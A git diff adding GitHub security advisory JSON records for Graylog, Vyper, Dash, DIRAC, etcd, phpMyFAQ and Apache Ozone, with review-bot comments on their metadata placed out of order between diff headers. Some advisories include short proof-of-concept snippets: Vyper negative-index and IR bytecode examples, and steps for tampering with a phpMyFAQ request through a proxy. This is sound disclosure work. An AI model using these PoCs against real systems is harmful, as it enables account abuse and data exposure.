+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50782"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/pyca/cryptography/issues/9785"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2023-50782"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254432"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/pyca/cryptography"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-208"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-05T23:04:50Z",
+ "nvd_published_at": "2024-02-05T21:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-3xf8-g8gr-g7rh/GHSA-3xf8-g8gr-g7rh.json b/advisories/github-reviewed/2024/02/GHSA-3xf8-g8gr-g7rh/GHSA-3xf8-g8gr-g7rh.json
new file mode 100644
index 0000000000000..9855c5aa9748c
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-3xf8-g8gr-g7rh/GHSA-3xf8-g8gr-g7rh.json
@@ -0,0 +1,88 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3xf8-g8gr-g7rh", + "modified": "2024-02-07T20:24:43Z", + "published": "2024-02-07T18:24:20Z", + "aliases": [ + "CVE-2024-24823" + ], + "summary": "Graylog session fixation vulnerability through cookie injection", + "details": "### Impact\nReauthenticating with an existing session cookie would re-use that session id, even if for different user credentials.\nIn this case, the pre-existing session could be used to gain elevated access to an existing Graylog login session, provided the malicious user could successfully inject their session cookie into someone else's browser.\n\nThe complexity of such an attack is high, because it requires presenting a spoofed login screen and injection of a session cookie into an existing browser, potentially through an XSS attack. No such attack has been discovered.\n\n### Patches\nGraylog 5.1.11 and 5.2.4, and any versions of the 6.0 development branch contain patches to not re-use sessions under any circumstances, making this type of attack impossible.\n\n### Workarounds\nUsing short session expiration and explicit log outs of unused sessions can help limiting the attack vector. 
Unpatched this vulnerability exists, but is relatively hard to exploit.\nA proxy could be leveraged to clear the `authentication` cookie for the Graylog server URL for the `/api/system/sessions` endpoint, as that is the only one vulnerable.\n\nAnalysis provided by Fabian Yamaguchi - Whirly Labs (Pty) Ltd", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.graylog2:graylog2-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "5.1.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.graylog2:graylog2-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.2.0-alpha.1" + }, + { + "fixed": "5.2.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/Graylog2/graylog2-server/security/advisories/GHSA-3xf8-g8gr-g7rh" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24823" + }, + { + "type": "WEB", + "url": "https://github.com/Graylog2/graylog2-server/commit/1596b749db86368ba476662f23a0f0c5ec2b5097" + }, + { + "type": "WEB", + "url": "https://github.com/Graylog2/graylog2-server/commit/b93a66353f35a94a4e8f3f75ac4f5cdc5a2d4a6a" + }, + { + "type": "PACKAGE", + "url": "https://github.com/Graylog2/graylog2-server" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-384" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T18:24:20Z", + "nvd_published_at": "2024-02-07T18:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-52xq-j7v9-v4v2/GHSA-52xq-j7v9-v4v2.json b/advisories/github-reviewed/2024/02/GHSA-52xq-j7v9-v4v2/GHSA-52xq-j7v9-v4v2.json new file mode 100644 index 0000000000000..3287ceab8da93 --- /dev/null 
+++ b/advisories/github-reviewed/2024/02/GHSA-52xq-j7v9-v4v2/GHSA-52xq-j7v9-v4v2.json 
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-52xq-j7v9-v4v2", + "modified": "2024-02-07T20:23:59Z", + "published": "2024-02-07T17:27:58Z", + "aliases": [ + "CVE-2024-24563" + ], + "summary": "Vyper array negative index vulnerability", + "details": "### Summary\nArrays can be keyed by a signed integer, while they are defined for unsigned integers only. The typechecker doesn't throw when spotting the usage of an `int` as an index for an array. Typically, negative integers are filtered out at runtime by the bounds checker, but small enough (i.e. large in magnitude, ex. `-2**255 + 5`) quantities combined with large enough arrays (at least `2**255` in length) can pass the bounds checker, resulting in unexpected behavior.\n\nA contract search was performed, and no production contracts were found to be impacted.\n\n### Details\nThe typechecker allows the usage of signed integers to be used as indexes to arrays. The vulnerability is present in different forms in all versions. Here is an example from `0.3.10`:\nhttps://github.com/vyperlang/vyper/blob/c150fc49ee9375a930d177044559b83cb95f7963/vyper/semantics/types/subscriptable.py#L127-L137\n\nAs can be seen, the validation is performed against `IntegerT.any()`.\n\n### PoC\nIf the array is sufficiently large, it can be indexed with a negative value:\n```python\narr: public(uint256[MAX_UINT256])\n\n@external\ndef set(idx: int256, num: uint256):\n self.arr[idx] = num\n```\nFor signed integers, the 2's complement representation is used. Because the array was declared very large, the bounds checking will pass (negative values will simply be represented as very large numbers):\nhttps://github.com/vyperlang/vyper/blob/a1fd228cb9936c3e4bbca6f3ee3fb4426ef45490/vyper/codegen/core.py#L534-L541\n\n\n### Impact\nThere are two potential vulnerability classes: unpredictable behavior and accessing inaccessible elements.\n\n1. 
If it is possible to index an array with a negative integer without reverting, this is most likely not anticipated by the developer and such accesses can cause unpredictable behavior for the contract.\n\n2. If a contract has an invariant in the form `assert index < x` where both `index` and `x` are signed integers, the developer might suppose that no elements on indexes `y | y >= x` are accessible. However, by using negative indexes this can be bypassed.\n\nThe contract search found no production contracts impacted by these two classes of issues.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "vyper" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.3.10" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/vyperlang/vyper/security/advisories/GHSA-52xq-j7v9-v4v2" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24563" + }, + { + "type": "PACKAGE", + "url": "https://github.com/vyperlang/vyper" + }, + { + "type": "WEB", + "url": "https://github.com/vyperlang/vyper/blob/a1fd228cb9936c3e4bbca6f3ee3fb4426ef45490/vyper/codegen/core.py#L534-L541" + }, + { + "type": "WEB", + "url": "https://github.com/vyperlang/vyper/blob/c150fc49ee9375a930d177044559b83cb95f7963/vyper/semantics/types/subscriptable.py#L127-L137" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-129" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T17:27:58Z", + "nvd_published_at": "2024-02-07T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-547x-748v-vp6p/GHSA-547x-748v-vp6p.json b/advisories/github-reviewed/2024/02/GHSA-547x-748v-vp6p/GHSA-547x-748v-vp6p.json new file mode 100644 index 0000000000000..f5b25322d9eb3 --- /dev/null 
+++ b/advisories/github-reviewed/2024/02/GHSA-547x-748v-vp6p/GHSA-547x-748v-vp6p.json 
@@ -0,0 +1,169 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-547x-748v-vp6p",
+ "modified": "2024-02-02T18:10:51Z",
+ "published": "2024-02-02T06:30:31Z",
+ "aliases": [
+ "CVE-2024-21485"
+ ],
+ "summary": "Dash apps vulnerable to Cross-site Scripting",
+ "details": "Versions of the package dash-core-components before 2.13.0; all versions of the package dash-core-components; versions of the package dash before 2.15.0; all versions of the package dash-html-components; versions of the package dash-html-components before 2.0.16 are vulnerable to Cross-site Scripting (XSS) when the href of the a tag is controlled by an adversary. An authenticated attacker who stores a view that exploits this vulnerability could steal the data that's visible to another user who opens that view - not just the data already included on the page, but they could also, in theory, make additional requests and access other data accessible to this user. In some cases, they could also steal the access tokens of that user, which would allow the attacker to act as that user, including viewing other apps and resources hosted on the same server.\n\n**Note:**\n\nThis is only exploitable in Dash apps that include some mechanism to store user input to be reloaded by a different user.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "dash-core-components"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2.13.0"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "dash-html-components"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "2.0.0"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "dash-core-components"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "2.0.0"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "dash"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2.15.0"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "dash-html-components"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2.0.16"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21485"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/plotly/dash/issues/2729"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/plotly/dash/pull/2732"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/plotly/dash/commit/9920073c9a8619ae8f90fcec1924f2f3a4332a8c"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/plotly/dash"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/plotly/dash/releases/tag/v2.15.0"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.snyk.io/vuln/SNYK-JS-DASHCORECOMPONENTS-6183084"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.snyk.io/vuln/SNYK-JS-DASHHTMLCOMPONENTS-6226337"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.snyk.io/vuln/SNYK-PYTHON-DASH-6226335"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.snyk.io/vuln/SNYK-PYTHON-DASHCORECOMPONENTS-6226334"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.snyk.io/vuln/SNYK-PYTHON-DASHHTMLCOMPONENTS-6226336"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-02T18:10:51Z",
+ "nvd_published_at": "2024-02-02T05:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-59qj-jcjv-662j/GHSA-59qj-jcjv-662j.json b/advisories/github-reviewed/2024/02/GHSA-59qj-jcjv-662j/GHSA-59qj-jcjv-662j.json
new file mode 100644
index 0000000000000..be0a05ca4a1d0
--- /dev/null
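Review bot: The `details` string lists five version clauses without naming the ecosystem each belongs to, so "all versions of the package dash-core-components" and "dash-core-components before 2.13.0" sit side by side with no way to tell from the text that one describes the PyPI entry carrying `last_affected` and the other the npm entry carrying `fixed`. Prefixing each clause with its ecosystem (npm / PyPI) would make the prose agree with the `affected` array. The two PyPI entries with `last_affected` and no `fixed` event signal that no fixed release is known for those package names; if the intended remediation for their users is the fixed `dash` release, saying so in `details` would make the path explicit.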
+++ b/advisories/github-reviewed/2024/02/GHSA-59qj-jcjv-662j/GHSA-59qj-jcjv-662j.json
@@ -0,0 +1,62 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-59qj-jcjv-662j",
+ "modified": "2024-02-08T15:32:52Z",
+ "published": "2024-02-08T15:32:51Z",
+ "aliases": [
+ "CVE-2024-24825"
+ ],
+ "summary": "DIRAC's TokenManager does not check permissions on cached tokens",
+ "details": "### Impact\n\nAny user could get a token that has been requested by another user/agent\n\n### Patches\nThe vulnerability is fixed in version 8.0.37.\n\n### Workarounds\n\nNone\n\n### References\n",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "DIRAC"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "8.0.0"
+ },
+ {
+ "fixed": "8.0.37"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/DIRACGrid/DIRAC/security/advisories/GHSA-59qj-jcjv-662j"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/DIRACGrid/DIRAC/commit/9487921684e2925b4cf72d6c423718cf4950f3fe"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/DIRACGrid/DIRAC/commit/f9ddab755b9a69acb85e14d2db851d8ac0c9648c"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/DIRACGrid/DIRAC"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-08T15:32:51Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-5x4g-q5rc-36jp/GHSA-5x4g-q5rc-36jp.json b/advisories/github-reviewed/2024/02/GHSA-5x4g-q5rc-36jp/GHSA-5x4g-q5rc-36jp.json
new file mode 100644
index 0000000000000..a14f3e12aeee0
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-5x4g-q5rc-36jp/GHSA-5x4g-q5rc-36jp.json
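Review bot: `severity` and `cwe_ids` are both empty while `database_specific.severity` is `CRITICAL`, so the CRITICAL rating in this record is not backed by any CVSS vector a consumer could reconcile it against. For an issue summarized as a missing permission check on cached tokens, a weakness entry such as CWE-863 (Incorrect Authorization) would fit the description, and adding a `CVSS_V3` entry under `severity` would let downstream tooling score it consistently with the other advisories in this commit. The `### References` heading at the end of `details` is empty; it could either be dropped or point at the two fix commits already listed under `references`.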
@@ -0,0 +1,72 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5x4g-q5rc-36jp",
+ "modified": "2024-02-03T00:02:58Z",
+ "published": "2024-02-03T00:02:58Z",
+ "aliases": [
+
+ ],
+ "summary": "Etcd pkg Insecure ciphers are allowed by default",
+ "details": "### Vulnerability type\nCryptography\n\n### Detail\nThe TLS ciphers list supported by etcd by default contains weak ciphers.\n\n### Workarounds\nProvide a desired ciphers using the `--cipher-suites` flag as described with examples in the [security documentation](https://github.com/etcd-io/etcd/blob/master/Documentation/op-guide/security.md)\n\n### References\nFind out more on this vulnerability in the [security audit report](https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Contact the [etcd security committee](https://github.com/etcd-io/etcd/blob/master/security/security-release-process.md#product-security-committee-psc)",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "go.etcd.io/etcd/client/pkg/v3"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "3.4.0-rc.0"
+ },
+ {
+ "fixed": "3.4.10"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 3.4.9"
+ }
+ },
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "go.etcd.io/etcd/client/pkg/v3"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "3.3.23"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/etcd-io/etcd/security/advisories/GHSA-5x4g-q5rc-36jp"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "LOW",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-03T00:02:58Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
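Review bot: Both `affected` entries name the module `go.etcd.io/etcd/client/pkg/v3`, yet the ranges describe 3.3.x and 3.4.x releases; as far as I can tell that module path only exists from the 3.5 line onward, so a Go vulnerability scanner resolving 3.3/3.4 dependencies may never match these ranges — worth confirming which module path each range should carry. The second entry also lacks the `database_specific.last_known_affected_version_range` that the first entry provides, so the two ranges are described inconsistently. Only the GHSA itself is listed under `references`; the `--cipher-suites` documentation and the audit report linked inside `details` could be added there so tooling that reads only the `references` array can surface the workaround.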
diff --git a/advisories/github-reviewed/2024/02/GHSA-6648-6g96-mg35/GHSA-6648-6g96-mg35.json b/advisories/github-reviewed/2024/02/GHSA-6648-6g96-mg35/GHSA-6648-6g96-mg35.json
new file mode 100644
index 0000000000000..18c166a70df55
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-6648-6g96-mg35/GHSA-6648-6g96-mg35.json
@@ -0,0 +1,69 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6648-6g96-mg35",
+ "modified": "2024-02-05T23:05:03Z",
+ "published": "2024-02-05T20:20:40Z",
+ "aliases": [
+ "CVE-2024-22202"
+ ],
+ "summary": "phpMyFAQ User Removal Page Allows Spoofing Of User Details",
+ "details": "### Summary\nphpMyFAQ's user removal page allows an attacker to spoof another user's detail, and in turn make a compelling phishing case for removing another user's account.\n\n### Details\nphpMyFAQ's user removal page allows an attacker to spoof another user's detail, and in turn make a compelling phishing case for removing another user's account. Whilst the front-end of this page doesn't allow changing the form details, an attacker can utilize a proxy to intercept this request and submit other data. Upon submitting this form, an email is sent to the administrator informing them that this user wants to delete their account. An administrator has no way of telling the difference between the actual user wishing to delete their account or the attacker issuing this for an account they do not control.\n\n### PoC\nWe are logged in as `hacker` and visit `/user/request-removal`. This brings us to the following page. We are not able to change the `username`, `Your name` and `Your email address` fields on this page.\n![image](https://user-images.githubusercontent.com/44903767/296202382-9e6d6409-3ffb-4983-8895-9903e7dfc663.png)\n\nHowever, we intercept this request using a proxy tool such as BurpSuite.\n![image](https://user-images.githubusercontent.com/44903767/296202522-dd80fe87-e7b7-4fe2-97be-dca03289f506.png)\n\nWe can now edit the request before sending it. We change the fields mentioned above to the details of another user, and send the request.\n![image](https://user-images.githubusercontent.com/44903767/296202705-fa8fd3f8-1417-457e-9d6e-7e4ba0f8744a.png)\n\nThis results in the following email being sent to the administrator. For them, it looks like the victim wants to delete their account.\n![image](https://user-images.githubusercontent.com/44903767/296202935-a5c48e0b-f93e-488a-9716-4f93889100a7.png)\n\n### Impact\nThe impact of this vulnerability is that administrators cannot trust the emails sent by the platform. An attacker can easily make a compelling case to perform phishing and get victim accounts deleted.\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "phpmyfaq/phpmyfaq"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "3.2.5"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-6648-6g96-mg35"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22202"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/thorsten/phpMyFAQ/commit/1348dcecdaec5a5714ad567c16429432417b534d"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/thorsten/phpMyFAQ"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.phpmyfaq.de/security/advisory-2024-02-05"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-284"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-05T20:20:40Z",
+ "nvd_published_at": "2024-02-05T20:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-6726-2rx3-cgwh/GHSA-6726-2rx3-cgwh.json b/advisories/github-reviewed/2024/02/GHSA-6726-2rx3-cgwh/GHSA-6726-2rx3-cgwh.json
new file mode 100644
index 0000000000000..70dae29dfe4cf
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-6726-2rx3-cgwh/GHSA-6726-2rx3-cgwh.json
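Review bot: The CVSS vector `C:N/I:N/A:H` records no integrity impact, yet the `details` describe the server accepting attacker-supplied `username`, name and email fields so that a removal request appears to come from another user; a forged identity in a security-relevant notification reads as an integrity impact, so the vector deserves a second look against the description. `cwe_ids` carries only CWE-284 (Improper Access Control), which is the generic parent; the mechanism described is the application trusting client-submitted identity fields instead of the authenticated session, and a more specific weakness entry would help consumers filter. Neither point changes the `affected` range.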
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6726-2rx3-cgwh",
+ "modified": "2024-02-07T19:23:35Z",
+ "published": "2024-02-07T15:30:48Z",
+ "aliases": [
+ "CVE-2023-39196"
+ ],
+ "summary": "Apache Ozone Improper Authentication vulnerability",
+ "details": "Improper Authentication vulnerability in Apache Ozone.\n\nThe vulnerability allows an attacker to download metadata internal to the Storage Container Manager service without proper authentication.\nThe attacker is not allowed to do any modification within the Ozone Storage Container Manager service using this vulnerability.\nThe accessible metadata does not contain sensitive information that can be used to exploit the system later on, and the accessible data does not make it possible to gain access to actual user data within Ozone.\nThis issue affects Apache Ozone: 1.2.0 and subsequent releases up until 1.3.0.\n\nUsers are recommended to upgrade to version 1.4.0, which fixes the issue.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.apache.ozone:ozone-main"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "1.2.0"
+ },
+ {
+ "fixed": "1.4.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39196"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/apache/ozone"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.apache.org/thread/o96ct5t7kj5cgrmmfc6756m931t08nky"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/02/07/2"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-287"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-07T19:23:35Z",
+ "nvd_published_at": "2024-02-07T13:15:07Z"
+ }
+}
\ No newline at end of file
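Review bot: The `details` text says the issue affects "1.2.0 and subsequent releases up until 1.3.0", which can be read as excluding 1.3.0, while the `affected` range (`introduced` 1.2.0, `fixed` 1.4.0) treats every 1.3.x release as affected. Since the same text recommends upgrading to 1.4.0, the range appears to be the intended reading; rewording the sentence to something like "affects Apache Ozone 1.2.0 through 1.3.x; fixed in 1.4.0" would remove the ambiguity for readers who act on the prose rather than the structured range.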
diff --git a/advisories/github-reviewed/2024/02/GHSA-6845-xw22-ffxv/GHSA-6845-xw22-ffxv.json b/advisories/github-reviewed/2024/02/GHSA-6845-xw22-ffxv/GHSA-6845-xw22-ffxv.json
new file mode 100644
index 0000000000000..045c42009f7aa
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-6845-xw22-ffxv/GHSA-6845-xw22-ffxv.json
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6845-xw22-ffxv",
+ "modified": "2024-02-05T23:06:50Z",
+ "published": "2024-02-05T19:21:52Z",
+ "aliases": [
+ "CVE-2024-24559"
+ ],
+ "summary": "Vyper sha3 codegen bug",
+ "details": "### Summary\nThere is an error in the stack management when compiling the `IR` for `sha3_64`. Concretely, the `height` variable is miscalculated.\nThe vulnerability can't be triggered without writing the `IR` by hand. That is, it cannot be triggered from regular vyper code, it can only be triggered by using the `fang` binary directly (this binary used to be called `vyper-ir` prior to v0.3.4).\n\n### Details\nTo compile `sha3_64`, the `arg[0]` and `arg[1]` have to be compiled:\nhttps://github.com/vyperlang/vyper/blob/c150fc49ee9375a930d177044559b83cb95f7963/vyper/ir/compile_ir.py#L585-L586\n\nAs can be seen, after compiling the 0th arg, the `height` variable isn't increased. If new `withargs` are defined in the inner scope, they are manipulated correctly, because both their `height` is off and also the global `height` is off and thus their placement on the stack is computed correctly.\n\n`sha3_64` is used for retrieval in mappings. No flow that would cache the `key` was found, the issue shouldn't be possible to trigger when compiling the compiler-generated `IR`.\n\n### PoC\nSuppose the following hand-written IR:\n```lisp\n(with _loc\n\t(with val 1 \n\t\t(with key 2 \n\t\t\t(sha3_64 val key))) \n\t\t\t\t(seq \n\t\t\t\t\t(sstore _loc \n\t\t\t\t\t(with x (sload _loc) \n\t\t\t\t\t\t(with ans (add x 1) (seq (assert (ge ans x)) ans))))))\n```\nafter compilation:\n```\nthe generated bytecode: 6001600281806020525f5260405f2090509050805460018101818110610026579050815550005b5f80fd\n\n0000 60 PUSH1 0x01\n0002 60 PUSH1 0x02\n0004 81 DUP2\n0005 80 DUP1 *********** bad code here!!!!!!\n0006 60 PUSH1 0x20\n0008 52 MSTORE\n```\n\nIt can be seen that the second `DUP` will dup the item on the top of the stack which is incorrect.\n\n### Impact\nVersions v0.2.0-v0.3.10 were evaluated, and access of the variable with the invalid height is not reachable from IR generated by the vyper front-end. Because the issue isn't triggered during normal compilation of vyper code, the impact is considered low.\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "vyper"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "0.3.10"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/vyperlang/vyper/security/advisories/GHSA-6845-xw22-ffxv"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24559"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/vyperlang/vyper"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/vyperlang/vyper/blob/c150fc49ee9375a930d177044559b83cb95f7963/vyper/ir/compile_ir.py#L585-L586"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-327"
+ ],
+ "severity": "LOW",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-05T19:21:52Z",
+ "nvd_published_at": "2024-02-05T21:15:12Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-6h78-85v2-mmch/GHSA-6h78-85v2-mmch.json b/advisories/github-reviewed/2024/02/GHSA-6h78-85v2-mmch/GHSA-6h78-85v2-mmch.json
new file mode 100644
index 0000000000000..0f9cb4289c765
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-6h78-85v2-mmch/GHSA-6h78-85v2-mmch.json
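Review bot: `cwe_ids` is `CWE-327` (Use of a Broken or Risky Cryptographic Algorithm), but the `details` describe a stack-`height` miscalculation in the code generator when compiling `sha3_64` IR, not any weakness in the hash algorithm; the classification looks like it was picked from the `sha3` name rather than from the defect. A calculation or code-generation weakness (for example CWE-682, Incorrect Calculation) would match the description better and stop crypto-focused consumers from being paged for a compiler bug. The CVSS vector's `C:L` also sits oddly with a defect the text says is unreachable from Vyper source; if the confidentiality impact is meant to apply only to hand-written IR fed to `fang`, stating that in `details` would help triage.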
@@ -0,0 +1,78 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6h78-85v2-mmch",
+ "modified": "2024-02-02T20:43:55Z",
+ "published": "2024-02-02T20:43:55Z",
+ "aliases": [
+ "CVE-2007-3215"
+ ],
+ "summary": "PHPMailer Shell command injection",
